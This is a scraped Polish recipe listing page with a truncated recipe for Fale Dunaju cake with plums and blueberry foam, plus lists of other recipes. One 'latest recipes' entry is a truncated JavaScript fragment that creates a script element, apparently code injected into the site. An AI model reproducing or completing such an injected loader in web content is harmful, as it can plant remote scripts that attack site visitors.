Fale Dunaju ze śliwkami i jagodową pianką
Źródło: https://www.slodkoslonepichcenie.pl/2019/10/fale-dunaju-ze-sliwkami-i-jagodowa.html
Znane i lubiane przez wszystkich ciasto Fale Dunaju w wersji ze sliwkami i smietanowo-jagodowa pianka.Fale Dunaju ze sliwkami - skladniki na ciasto:250 g masla1 szklanka cukru4 jajka2 szklanki maki2,5 lyzeczki proszku do pieczenia1 lyzka aromatu waniliowego2 lyzki kakao2 lyzki mlekaokolo 600 g sliwek2 lyzki cukru brazowegoFale Dunaju ze sliwkami - skladniki na jagodowa pianke:2 szklanki wrza...
Najnowsze przepisy
Śledzie gajowego z suszonymi borowikami (po myśliwsku)Są... ⇖ 15
(function(){ ak45=document.createElement("script");ak45_="o" ⇖ 9
Batat z pieca, lekko przypieczony na krawędziach i kremowy... ⇖ 19
Domowy chleb z ziarnami – puszysty, aromatyczny i idealny... ⇖ 16
Serniki z PodkarpaciaPrzeglądając podkarpackie przepisy... ⇖ 21
Przepisy z bloga
Kotlety mielone to jedno z najbardziej klasycznych dań,... ⇖ 217
Doskonałe, warstwowe ciasto z brzoskwiniami, które nie... ⇖ 387
Zrazy z mięsa mielonego faszerowane boczkiem i pieczarkami... ⇖ 242
Roladki z tortilli z szynką i serem żółtym zapiekane w... ⇖ 303
Puszysty sernik na spodzie Twix łączy w sobie kremową,... ⇖ 275
Kurczak w sosie pieczarkowym to pyszne i aromatyczne danie,... ⇖ 430
Spaghetti z kurczakiem, cukinią i pomidorkami koktajlowymi... ⇖ 434
Żeberka w sosie barbecue to jedno z najpopularniejszych... ⇖ 406
Przepisy na czasie
Masz ochotę na coś słodkiego bez pieczenia? Zrób sernik... ⇖ 1813
Piernik przekładany kremem to jedno z tych ciast, które... ⇖ 1192
To niezwykle proste ciasto piernikowe, które zawsze się... ⇖ 696
NAJLEPSZY PRZEPIS NA CIASTO NA PIEROŻKIBardzo lubię... ⇖ 688
Cześć! Dzisiaj robimy ciasto lion bez pieczenia, to... ⇖ 614
Sernik łaciaty z brzoskwiniami i makiem to ciasto, które... ⇖ 603
Kremowe, delikatne ciasto z białą czekoladą i cukierkami... ⇖ 566
Przepyszny domowy pasztet do smarowania. W sklepie tak... ⇖ 490
Pyszny, mięciutki i delikatny. Idealne na półmisek... ⇖ 481
Paszteciki z mięsem, z ciasta drożdżowo-kruchego to... ⇖ 466









































